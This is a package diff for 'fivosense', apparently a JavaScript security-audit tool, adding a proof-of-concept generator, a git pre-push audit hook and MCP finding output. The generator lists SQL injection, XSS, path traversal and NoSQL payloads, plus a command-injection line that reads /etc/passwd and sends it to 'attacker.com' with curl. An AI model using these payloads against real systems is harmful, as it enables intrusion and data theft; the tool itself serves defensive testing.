fivosense 0.1.4 → 0.1.6

package/dist/engine/poc.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"poc.d.ts","sourceRoot":"","sources":["../../src/engine/poc.ts"],"names":[],"mappings":"AAAA;;GAEG;AAEH,OAAO,EAAE,UAAU,EAAE,MAAM,oBAAoB,CAAC;AAEhD,MAAM,WAAW,OAAO;IACtB,QAAQ,EAAE,MAAM,CAAC;IACjB,OAAO,EAAE,MAAM,CAAC;IAChB,gBAAgB,EAAE,MAAM,CAAC;IACzB,QAAQ,EAAE,MAAM,CAAC;IACjB,WAAW,CAAC,EAAE,MAAM,CAAC;CACtB;AA8ID;;GAEG;AACH,wBAAgB,WAAW,CAAC,KAAK,EAAE,UAAU,GAAG,OAAO,CA6BtD;AAED;;GAEG;AACH,wBAAgB,iBAAiB,CAAC,GAAG,EAAE,OAAO,GAAG,MAAM,CAoBtD"}

package/dist/engine/poc.js

@@ -0,0 +1,176 @@
+/**
+ * PoC Generator - Generate proof-of-concept exploits
+ */
+/**
+ * Generate SQL injection PoC
+ */
+function generateSQLPoC(trace) {
+    const payloads = [
+        "' OR '1'='1",
+        "'; DROP TABLE users--",
+        "' UNION SELECT NULL, username, password FROM users--",
+    ];
+    const payload = payloads[0];
+    return {
+        category: 'SQL Injection',
+        payload,
+        expectedBehavior: 'Bypasses authentication or extracts data',
+        testCode: `
+// Test SQL Injection
+const maliciousInput = "${payload}";
+const query = "SELECT * FROM users WHERE id = '" + maliciousInput + "'";
+// Expected: Query becomes: SELECT * FROM users WHERE id = '' OR '1'='1'
+// Result: Returns all users (authentication bypass)
+`,
+        curlCommand: trace.path.includes('req.')
+            ? `curl -X POST http://localhost:3000/api/endpoint -d "id=${encodeURIComponent(payload)}"`
+            : undefined,
+    };
+}
+/**
+ * Generate XSS PoC
+ */
+function generateXSSPoC(trace) {
+    const payloads = [
+        '<script>alert(document.cookie)</script>',
+        '<img src=x onerror=alert(1)>',
+        '<svg onload=alert(1)>',
+    ];
+    const payload = payloads[0];
+    return {
+        category: 'Cross-Site Scripting (XSS)',
+        payload,
+        expectedBehavior: 'Executes JavaScript in victim browser',
+        testCode: `
+// Test XSS
+const maliciousInput = "${payload}";
+document.getElementById('output').innerHTML = maliciousInput;
+// Expected: Script executes, shows alert with cookies
+// Impact: Session hijacking, data theft
+`,
+        curlCommand: trace.path.includes('req.')
+            ? `curl "http://localhost:3000/page?name=${encodeURIComponent(payload)}"`
+            : undefined,
+    };
+}
+/**
+ * Generate Command Injection PoC
+ */
+function generateCommandPoC(trace) {
+    const payloads = [
+        '; cat /etc/passwd',
+        '| whoami',
+        '&& curl attacker.com/?data=$(cat /etc/passwd)',
+    ];
+    const payload = payloads[0];
+    return {
+        category: 'Command Injection',
+        payload,
+        expectedBehavior: 'Executes arbitrary system commands',
+        testCode: `
+// Test Command Injection
+const maliciousInput = "file.txt${payload}";
+exec(\`cat \${maliciousInput}\`);
+// Expected: Runs: cat file.txt; cat /etc/passwd
+// Result: Leaks system password file
+`,
+        curlCommand: trace.path.includes('req.')
+            ? `curl -X POST http://localhost:3000/api/command -d "file=test.txt${encodeURIComponent(payload)}"`
+            : undefined,
+    };
+}
+/**
+ * Generate Path Traversal PoC
+ */
+function generatePathTraversalPoC(trace) {
+    const payloads = [
+        '../../../etc/passwd',
+        '..\\..\\..\\windows\\system32\\config\\sam',
+        '....//....//....//etc/passwd',
+    ];
+    const payload = payloads[0];
+    return {
+        category: 'Path Traversal',
+        payload,
+        expectedBehavior: 'Reads files outside intended directory',
+        testCode: `
+// Test Path Traversal
+const maliciousInput = "${payload}";
+fs.readFile(\`/uploads/\${maliciousInput}\`, (err, data) => {
+  // Expected: Reads /etc/passwd instead of /uploads/file
+  // Result: Exposes sensitive system files
+});
+`,
+        curlCommand: trace.path.includes('req.')
+            ? `curl "http://localhost:3000/download?file=${encodeURIComponent(payload)}"`
+            : undefined,
+    };
+}
+/**
+ * Generate NoSQL Injection PoC
+ */
+function generateNoSQLPoC(trace) {
+    const payload = '{"$gt": ""}';
+    return {
+        category: 'NoSQL Injection',
+        payload,
+        expectedBehavior: 'Bypasses authentication or extracts data',
+        testCode: `
+// Test NoSQL Injection
+const maliciousInput = ${payload};
+db.collection('users').find({ username: req.body.username, password: maliciousInput });
+// Expected: Query matches all documents (password always > "")
+// Result: Authentication bypass
+`,
+        curlCommand: trace.path.includes('req.')
+            ? `curl -X POST http://localhost:3000/login -H "Content-Type: application/json" -d '{"username":"admin","password":${payload}}'`
+            : undefined,
+    };
+}
+/**
+ * Generate PoC based on vulnerability type
+ */
+export function generatePoC(trace) {
+    switch (trace.category.toLowerCase()) {
+        case 'sql':
+            return generateSQLPoC(trace);
+        case 'xss':
+            return generateXSSPoC(trace);
+        case 'command':
+            return generateCommandPoC(trace);
+        case 'path':
+            return generatePathTraversalPoC(trace);
+        case 'nosql':
+            return generateNoSQLPoC(trace);
+        default:
+            return {
+                category: trace.category,
+                payload: '<malicious-input>',
+                expectedBehavior: 'Exploits vulnerability',
+                testCode: `
+// Generic test for ${trace.category}
+const maliciousInput = "<malicious-input>";
+// Test with malicious input to verify vulnerability
+`,
+            };
+    }
+}
+/**
+ * Format PoC as markdown
+ */
+export function formatPoCMarkdown(poc) {
+    let md = `## ${poc.category} - Proof of Concept\n\n`;
+    md += `### Payload\n\`\`\`\n${poc.payload}\n\`\`\`\n\n`;
+    md += `### Expected Behavior\n${poc.expectedBehavior}\n\n`;
+    md += `### Test Code\n\`\`\`javascript${poc.testCode}\n\`\`\`\n\n`;
+    if (poc.curlCommand) {
+        md += `### HTTP Test\n\`\`\`bash\n${poc.curlCommand}\n\`\`\`\n\n`;
+    }
+    md += `### Mitigation\n`;
+    md += `- Use parameterized queries or prepared statements\n`;
+    md += `- Validate and sanitize all user input\n`;
+    md += `- Use allow-lists instead of block-lists\n`;
+    md += `- Apply principle of least privilege\n`;
+    return md;
+}
+//# sourceMappingURL=poc.js.map

package/dist/engine/poc.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"poc.js","sourceRoot":"","sources":["../../src/engine/poc.ts"],"names":[],"mappings":"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"}

package/dist/features/index.d.ts

@@ -0,0 +1,7 @@
+/**
+ * Features exports
+ */
+export * from './roast.js';
+export * from './badge.js';
+export * from './fix.js';
+//# sourceMappingURL=index.d.ts.map

package/dist/features/index.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.d.ts","sourceRoot":"","sources":["../../src/features/index.ts"],"names":[],"mappings":"AAAA;;GAEG;AAEH,cAAc,YAAY,CAAC;AAC3B,cAAc,YAAY,CAAC;AAC3B,cAAc,UAAU,CAAC"}

package/dist/features/index.js

@@ -0,0 +1,7 @@
+/**
+ * Features exports
+ */
+export * from './roast.js';
+export * from './badge.js';
+export * from './fix.js';
+//# sourceMappingURL=index.js.map

package/dist/features/index.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"index.js","sourceRoot":"","sources":["../../src/features/index.ts"],"names":[],"mappings":"AAAA;;GAEG;AAEH,cAAc,YAAY,CAAC;AAC3B,cAAc,YAAY,CAAC;AAC3B,cAAc,UAAU,CAAC"}

package/dist/hooks/git.d.ts

@@ -0,0 +1,31 @@
+/**
+ * Git Hooks - Pre-push security audit
+ */
+export interface GitHookResult {
+    allowed: boolean;
+    findings: number;
+    critical: number;
+    high: number;
+    message: string;
+}
+/**
+ * Get list of staged files
+ */
+export declare function getStagedFiles(): Promise<string[]>;
+/**
+ * Get list of files changed in current branch vs main
+ */
+export declare function getBranchChangedFiles(base?: string): Promise<string[]>;
+/**
+ * Run pre-push hook audit
+ */
+export declare function runPrePushHook(options?: {
+    blockOnCritical?: boolean;
+    blockOnHigh?: boolean;
+    verbose?: boolean;
+}): Promise<GitHookResult>;
+/**
+ * Install git pre-push hook
+ */
+export declare function installPrePushHook(repoPath?: string): Promise<boolean>;
+//# sourceMappingURL=git.d.ts.map

package/dist/hooks/git.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"git.d.ts","sourceRoot":"","sources":["../../src/hooks/git.ts"],"names":[],"mappings":"AAAA;;GAEG;AASH,MAAM,WAAW,aAAa;IAC5B,OAAO,EAAE,OAAO,CAAC;IACjB,QAAQ,EAAE,MAAM,CAAC;IACjB,QAAQ,EAAE,MAAM,CAAC;IACjB,IAAI,EAAE,MAAM,CAAC;IACb,OAAO,EAAE,MAAM,CAAC;CACjB;AAED;;GAEG;AACH,wBAAsB,cAAc,IAAI,OAAO,CAAC,MAAM,EAAE,CAAC,CAWxD;AAED;;GAEG;AACH,wBAAsB,qBAAqB,CAAC,IAAI,GAAE,MAAe,GAAG,OAAO,CAAC,MAAM,EAAE,CAAC,CAWpF;AAED;;GAEG;AACH,wBAAsB,cAAc,CAAC,OAAO,GAAE;IAC5C,eAAe,CAAC,EAAE,OAAO,CAAC;IAC1B,WAAW,CAAC,EAAE,OAAO,CAAC;IACtB,OAAO,CAAC,EAAE,OAAO,CAAC;CACd,GAAG,OAAO,CAAC,aAAa,CAAC,CAoG9B;AAED;;GAEG;AACH,wBAAsB,kBAAkB,CAAC,QAAQ,GAAE,MAAY,GAAG,OAAO,CAAC,OAAO,CAAC,CAkBjF"}

package/dist/hooks/git.js

@@ -0,0 +1,155 @@
+/**
+ * Git Hooks - Pre-push security audit
+ */
+import { auditFile } from '../index.js';
+import { exec } from 'child_process';
+import { promisify } from 'util';
+const execAsync = promisify(exec);
+/**
+ * Get list of staged files
+ */
+export async function getStagedFiles() {
+    try {
+        const { stdout } = await execAsync('git diff --cached --name-only --diff-filter=ACM');
+        return stdout
+            .split('\n')
+            .filter(f => f.endsWith('.js') || f.endsWith('.ts') || f.endsWith('.jsx') || f.endsWith('.tsx'))
+            .filter(f => f.trim().length > 0);
+    }
+    catch (error) {
+        console.warn('Failed to get staged files:', error);
+        return [];
+    }
+}
+/**
+ * Get list of files changed in current branch vs main
+ */
+export async function getBranchChangedFiles(base = 'main') {
+    try {
+        const { stdout } = await execAsync(`git diff --name-only ${base}...HEAD`);
+        return stdout
+            .split('\n')
+            .filter(f => f.endsWith('.js') || f.endsWith('.ts') || f.endsWith('.jsx') || f.endsWith('.tsx'))
+            .filter(f => f.trim().length > 0);
+    }
+    catch (error) {
+        console.warn('Failed to get branch changed files:', error);
+        return [];
+    }
+}
+/**
+ * Run pre-push hook audit
+ */
+export async function runPrePushHook(options = {}) {
+    const { blockOnCritical = true, blockOnHigh = false, verbose = true, } = options;
+    try {
+        // Get files to audit
+        const files = await getBranchChangedFiles();
+        if (files.length === 0) {
+            return {
+                allowed: true,
+                findings: 0,
+                critical: 0,
+                high: 0,
+                message: '✅ No JavaScript/TypeScript files changed',
+            };
+        }
+        if (verbose) {
+            console.log(`\n🔍 FivoSense Pre-Push Audit`);
+            console.log(`📁 Scanning ${files.length} file(s)...\n`);
+        }
+        let totalFindings = 0;
+        let totalCritical = 0;
+        let totalHigh = 0;
+        const issues = [];
+        // Audit each file
+        for (const file of files) {
+            try {
+                const result = await auditFile(file);
+                if (result.summary.total > 0) {
+                    totalFindings += result.summary.total;
+                    totalCritical += result.summary.critical;
+                    totalHigh += result.summary.high;
+                    if (verbose && (result.summary.critical > 0 || result.summary.high > 0)) {
+                        console.log(`❌ ${file}:`);
+                        console.log(`   Critical: ${result.summary.critical}, High: ${result.summary.high}, Medium: ${result.summary.medium}`);
+                        issues.push(`${file}: ${result.summary.critical}C/${result.summary.high}H/${result.summary.medium}M`);
+                    }
+                }
+            }
+            catch (error) {
+                if (verbose) {
+                    console.warn(`⚠️  Failed to audit ${file}:`, error);
+                }
+            }
+        }
+        // Determine if push should be blocked
+        const shouldBlock = (blockOnCritical && totalCritical > 0) || (blockOnHigh && totalHigh > 0);
+        if (verbose) {
+            console.log(`\n📊 Summary:`);
+            console.log(`   Total findings: ${totalFindings}`);
+            console.log(`   Critical: ${totalCritical}`);
+            console.log(`   High: ${totalHigh}\n`);
+        }
+        if (shouldBlock) {
+            return {
+                allowed: false,
+                findings: totalFindings,
+                critical: totalCritical,
+                high: totalHigh,
+                message: `❌ Push blocked: ${totalCritical} critical and ${totalHigh} high severity issues found\n\n${issues.join('\n')}\n\nFix these issues or use --no-verify to bypass.`,
+            };
+        }
+        if (totalFindings > 0) {
+            return {
+                allowed: true,
+                findings: totalFindings,
+                critical: totalCritical,
+                high: totalHigh,
+                message: `⚠️  Push allowed with warnings: ${totalFindings} issue(s) found (${totalCritical}C/${totalHigh}H)`,
+            };
+        }
+        return {
+            allowed: true,
+            findings: 0,
+            critical: 0,
+            high: 0,
+            message: '✅ All files passed security audit',
+        };
+    }
+    catch (error) {
+        return {
+            allowed: true,
+            findings: 0,
+            critical: 0,
+            high: 0,
+            message: `⚠️  Pre-push hook failed: ${error instanceof Error ? error.message : 'Unknown error'}`,
+        };
+    }
+}
+/**
+ * Install git pre-push hook
+ */
+export async function installPrePushHook(repoPath = '.') {
+    try {
+        const hookPath = `${repoPath}/.git/hooks/pre-push`;
+        const hookScript = `#!/bin/sh
+# FivoSense pre-push hook
+npx fivosense --pre-push
+exit $?
+`;
+        await writeFile(hookPath, hookScript);
+        await execAsync(`chmod +x ${hookPath}`);
+        console.log('✅ Pre-push hook installed successfully');
+        return true;
+    }
+    catch (error) {
+        console.error('❌ Failed to install pre-push hook:', error);
+        return false;
+    }
+}
+async function writeFile(path, content) {
+    const { writeFile } = await import('fs/promises');
+    await writeFile(path, content);
+}
+//# sourceMappingURL=git.js.map

package/dist/hooks/git.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"git.js","sourceRoot":"","sources":["../../src/hooks/git.ts"],"names":[],"mappings":"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"}

package/mcp/index.js

@@ -117,17 +117,33 @@ server.setRequestHandler(CallToolRequestSchema, async (request) => {
           low: result.summary.low,
         };
 
-        const findings = result.findings.map(f => ({
-          type: f.type,
-          severity: f.severity,
-          message: f.message,
-          source: f.source,
-          sink: f.sink,
-          cwe: f.cwe,
-          line: f.line,
-          evidence: f.evidence,
-          fix: f.fix,
-        }));
+        // Combine vulnerabilities and secrets
+        const allFindings = [
+          ...result.vulnerabilities.map(v => ({
+            type: v.category,
+            severity: v.severity,
+            message: `${v.finding} vulnerability detected`,
+            source: v.path[0] || 'unknown',
+            sink: v.path[v.path.length - 1] || 'unknown',
+            cwe: v.cwe,
+            line: v.location.line,
+            evidence: v.evidence.filter(e => e.line).map(e => `${e.type} at line ${e.line}`).join(', ') || 'No evidence',
+            fix: 'Use proper sanitization (parameterized queries, input validation, etc.)',
+          })),
+          ...result.secrets.map(s => ({
+            type: 'secret',
+            severity: 'high',
+            message: `${s.type} detected`,
+            source: 'hardcoded',
+            sink: 'code',
+            cwe: 'CWE-798',
+            line: s.line,
+            evidence: s.match,
+            fix: 'Use environment variables',
+          }))
+        ];
+        
+        const findings = allFindings;
 
         return {
           content: [
@@ -158,17 +174,29 @@ server.setRequestHandler(CallToolRequestSchema, async (request) => {
